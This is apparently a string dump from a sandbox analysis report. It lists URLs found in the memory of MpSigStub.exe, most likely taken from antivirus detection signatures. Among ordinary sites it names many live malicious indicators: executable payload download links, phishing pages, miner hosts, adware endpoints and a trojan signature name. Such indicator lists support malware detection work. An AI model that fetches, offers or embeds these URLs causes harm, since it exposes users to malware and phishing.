Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://www.fenomen-games.com/dhome.htmxM
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txt
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txtxN
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://www.fixarabul.com
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://www.fixarasana.com
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.flashempire.com/
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://www.flashkin.net
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://www.fopo.com.ar/thiscodewascreatedon
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.friend-card.com/pickup.aspx?code=
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.friend-greeting.net/pickup.aspx?code=
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.friendgreeting.com/pickup.aspx?code=
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp String found in binary or memory: http://www.friskypotato.com/
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://www.friskypotato.com/codec/mp3/activecod3
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://www.g00gleadserver.com/list.txt
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://www.gamedanji.cn/ExeIni
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.general-insurance.net/wp-content/themes/general-ins-net/po
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.geocities.com/joke_haha2001
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://www.getip.pw
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://www.getpricefinder.com/
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.getsav-in.compublisheradpeak
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://www.gistery.trade/sys/designbolts.exe
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: http://www.gnu.org/licenses/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://www.go2000.com/?4
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://www.go2000.com/?4aM
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://www.goldwindos2000.com/hkeraone/hker.htmwidht=0height=0
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.goldwindos2000.com/krratwo/hker.htm
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp String found in binary or memory: http://www.goodtimesplayer.com/license.cgi?vidlock_params=
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://www.google.cn/search?complete=1&hl=zh-CN&inlang=zh-CN&newwindow=1&q=
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://www.google.cn/search?hl=zh-CN&q=
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.google.cn/search?q=%s
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com.br
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com.tr/
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrerMicrosoft
Source: MpSigStub.exe, 00000024.00000003.6229929208.0000019793FDC000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrercookienode.appendChild()
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://www.googleledal.com/traff1/go.php?sid=1
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.gooo.ru
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://www.gorillawalker.com
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp String found in binary or memory: http://www.greenpartnership.jp
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://www.guzzotorino.it/ups-ship-notification
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://www.haibugmm.com/ba/yfctbzla
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://www.hao123.com/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://www.hao123.com/?tn=
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: http://www.haosoft.net/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.hasandanalioglu.com/wp-content/n_v/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://www.hjsdffsfs.aonecommercial.com
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://www.hljcm.com/c
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://www.hoarafushionline.net/extractf.php?x=
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://www.hoarafushionline.net/habeys.exe
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://www.hohosearch.com/?ts=
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://www.hotbar.com
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://www.hotdutchporn.net/cb/scripts/getAddressFromIP.php?wmid=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://www.hotelelun.cl/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://www.htylk.esy.es/nobe/downloaddocument-adobesignin.html
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp String found in binary or memory: http://www.hustler-exclusive.com/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: http://www.hxlive.cn
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://www.i-cash.de/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.iask.com/s?k=%s
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.icbc.com.cn/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.iciba.com/search?s=%s
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.idownline.com/members/idownline
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.imobile.com.cn/
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://www.inet4you.com/exit/
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://www.infoaxe.com/enhancedsearchform.jsp
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.infoodesk.org/wizzy/wizzy/mailmine.html)
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://www.infotraffik-01.space/?
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.installmonetizer.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp String found in binary or memory: http://www.instantmp3player.com
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/idcard.php?q=%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/ip.php?q=%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/mobile.php?q=%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/tel.php?q=%s
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://www.ip138.com
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://www.ip138.comx
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://www.ip2location.com/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://www.ipvoips.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.isihodiernatunisi.com/online/zixmessage.htm)
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: http://www.istartsurf.com
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://www.itau.com.br
Source: MpSigStub.exe, 00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp String found in binary or memory: http://www.j.mp/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://www.j.mp/ajdddsdiocsjcjosdj
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp String found in binary or memory: http://www.jajaan.com/ip.asp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://www.jejuseongahn.org/hboard4/data/cheditor/badu/alpha.php?v
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://www.jesuser.cn/plug/doSelect.asp?CMD=%s
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.joyo.com/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.jplineage.com/firo/mail.asp?tomail=163
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlinexl
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://www.jsonrpc.org/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://www.jword.jp/
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp String found in binary or memory: http://www.key-logger.ws
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: http://www.klikspaandelft.nl/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.komikeglence.com/
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp String found in binary or memory: http://www.kryogenix.org/code/browser/sorttable/
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp String found in binary or memory: http://www.kssoftware.ch
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://www.kuku530.com/?
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://www.kuku530.com/?Favorites
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.lindenmontessori.com/cgi-bin/hr_9x/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://www.linkinc.es/scss/water.php
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp String found in binary or memory: http://www.lis.eu
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://www.livecare.net/x
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://www.livejournal.com/search/?how=tm&area=default&q=%s
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://www.livejournal.com/search/?how=tm&area=default&q=%sx
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.lk2006.com/q15/index.htm
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.lollipop-network.com/privacy.php?lg=
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com/
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com/cgi
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com/products/
Source: MpSigStub.exe, 00000024.00000003.6270214588.00000197A4657000.00000004.00000001.sdmp String found in binary or memory: http://www.lop.com/search/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://www.xupiter.com/d
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: http://www.xzwrn.cn/
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://www.yessearches.com/?ts=
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://www.yfdc.com.tw/wp-content/uploads/2015/11/z.htm
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://www.yihaha.net/
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp String found in binary or memory: http://www.yklbtrnklnbkjrnbjyrbnjka.com
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.yodao.com/search?ue=utf8&q=%s
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://www.youndoo.com/?z=
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com/
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com/watch?v=
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com/watch?v=Vjp7vgj119s
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com/watch?v=nqpod5at30g
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: http://www.ysbweb.com/ist/scripts/ysb_prompt.php?retry=2&loadfirst=1&delayload=0&software_id=10&acco
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: http://www.ysbweb.com/ist/softwares/v4.0/ysb_regular.cab
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://www.yuyu.com/?fav2
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp String found in binary or memory: http://www.zabosaltd.biz/wafugi?id=COMPIDHERE&w=WEBMIDHERE&step=
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongsou.com/kefu/zskf.htm
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.ziduscapital.com/en/_mmserverscripts/index.php?e=)
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://www.zixzelz1.narod.ru/
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://www.znoo.net
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://www.zv05.com/sys2a
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.zxboy.com#http://
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://www1.yzsc.cn/cash
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://www5.baidu.com/baidu?
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://www5.baidu.com/s?
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://www6.badesugerwakirpos.com/chr/907/nt.exe
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://www6HSTR:Trojan:Win32/Stration.KFOP:Stration.encHSTR:TrojanDownloader:Win32/Stration_executeS
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: http://wwwwww.f2kk.cn
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: http://x0.nl/install/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://x01c4fr.sed.doormedic.com
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://x3redir.mooo.com?r=wmp&title=
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://xinblasta.us/cj/siyrhz.doc
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://xisake.biz/control/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://xmr-services.com/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://xmr.enjoytopic.tk
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://xn----9sblbqqdv0a5a8fwb.xn--p1ai/includes/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://xn----dtbhbqh9ajceeeg2m.org/components
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://xn---82-qdd0akcfirgv4j.xn--p1ai/ups-ship-notification/mar-13-18-07-06-38/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://xpressdelivery.ga/guangzhou/guangzhou2.html)
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://xupaeudenovo.net/net.jsp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://xx.522love.cn/tool/down
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://xxxlive.info/spot4
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e8ar
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e8he
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e8qq
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e8u9
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e9yp
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/ecpx
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: http://y31uv4ra1.vo.llnwd.net/js/advancedmactuneup/macpro/mcprinfo.ini
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://yamaofficial.com/rxuczm/3415201.png
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://yasovetn1k.ru/files/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://yawaop.com/anna.doc
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://yc.book.sohu.com/series_list.php?select=1&text=%s
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://ydlevents.com.my/www/ucountredeem/php/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://yeabests.cc
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://ygsondheks.info/c/
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://your_updater.com/privacy-policyso.html
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://youssef-tawil.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ys.cn.yahoo.com/mohu/index.html?p=%s
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://yuksekovabali.com/rgvtr6wcaw2yyy6pkz6qvrj6)
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp String found in binary or memory: http://yupsearch.com
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://yy.web1000wip.com:4567/bnb/css.js
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://z1.nf-2.net/512.txt
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://z360.net/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://z7v8.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp String found in binary or memory: http://zaxarstore2.com/download.php
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://zero.allgreathost.com
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://zero.bestmanage1.org
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://zero.bestmanage2.org
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://zero.bestmanage3.org
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://zero.sisdotnet.com
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://zero.xujace.com
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://zhsh.j.nj.twsapp.com
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://zief.pl/rc/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://zigyyt.com/trix.exe
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://zillot.kz/System/mysql/users.php
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://zilmaraalencar.com.br/layouts/plugins/editors/tinymce/field/zzurphy.php
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://zlnewly.hk/fun.exe
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://zr.webhop.org:1337
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://zsnews.zhongsou.com/zsnews.cgi?tps=3&agent=%s&word=
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: http://zsxz.zhongsou.com/route/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://zxtenrnewlaunchinworldwide.mangospot.net/.-..................................................
